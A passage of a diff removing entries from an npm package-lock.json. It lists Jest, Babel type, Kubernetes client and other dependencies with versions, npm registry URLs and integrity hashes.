"sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } - } - }, - "@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - } - }, - "@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, - "requires": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" - } - }, - "@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - } - }, - "@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } - } - }, - "@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.25.16" - } - }, - "@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - }, - "dependencies": { - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "@kubernetes/client-node": { - "version": "0.18.1", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.18.1.tgz", - "integrity": "sha512-F3JiK9iZnbh81O/da1tD0h8fQMi/MDttWc/JydyUVnjPEom55wVfnpl4zQ/sWD4uKB8FlxYRPiLwV2ZXB+xPKw==", - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^18.11.17", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tmp-promise": "^3.0.2", - "tslib": "^2.4.1", - "underscore": "^1.13.6", - "ws": "^8.11.0" - }, - "dependencies": { - "@types/node": { - "version": "18.13.0", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.13.0.tgz", - "integrity": "sha512-gC3TazRzGoOnoKAhUx+Q0t8S9Tzs74z7m0ipwGpSqQrleP14hKxP4/JUeEQcD3W1/aIpnWl8pHowI7WokuZpXg==" - } - } - }, - "@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "requires": { - "@sinonjs/commons": "^2.0.0" - } - }, - "@types/babel__core": { - "version": "7.1.15", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.1.15.tgz", - "integrity": "sha512-bxlMKPDbY8x5h6HBwVzEOk2C8fb6SLfYQ5Jw3uBYuYF1lfWk/kbLd81la82vrIkBb0l+JdmrZaDikPrNxpS/Ew==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.3.tgz", - "integrity": "sha512-/GWCmzJWqV7diQW54smJZzWbSFf4QYtF71WCKhcx6Ru/tFyQIY2eiiITcCAeuPbNSvT9YCGkVMqqvSk2Z0mXiA==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.14.2", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.14.2.tgz", - "integrity": "sha512-K2waXdXBi2302XUdcHcR1jCeU0LL4TD9HRs/gk0N2Xvrht+G/BfJa4QObBQZfhMdxiCpV3COl5Nfq4uKTeTnJA==", - "dev": true, - "requires": { - "@babel/types": "^7.3.0" - } - }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "@types/graceful-fs": { - "version": "4.1.5", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.5.tgz", - "integrity": "sha512-anKkLmZZ+xm4p8JWBf4hElkM4XR+EZeA2M9BAkkTldmcyDY4mbdIJnRghDJH3Ov5ooY7/UAoENtmdMSkaAd7Cw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/js-yaml": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", - "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" - }, - "@types/lodash": { - "version": "4.14.172", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", - "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", - "dev": true - }, - "@types/mustache": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", - "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", - "dev": true - }, - "@types/node": { - "version": "16.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.11.19.tgz", - "integrity": "sha512-BPAcfDPoHlRQNKktbsbnpACGdypPFBuX4xQlsWDE7B8XXcfII+SpOLay3/qZmCLb39kV5S1RTYwXdkx2lwLYng==" - }, - "@types/nodemailer": { - "version": "6.4.4", - "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", - "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/nunjucks": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", - "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "@types/request": { - "version": "2.48.7", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.7.tgz", - "integrity": "sha512-GWP9AZW7foLd4YQxyFZDBepl0lPsWLMEXDZUjQ/c1gqVPDPECrRZyEzuhJdnPWioFCq3Tv0qoGpMD6U+ygd4ZA==", - "requires": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==" - }, - "@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "requires": { - "@types/node": "*" - } - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "a-sync-waterfall": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", - "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": 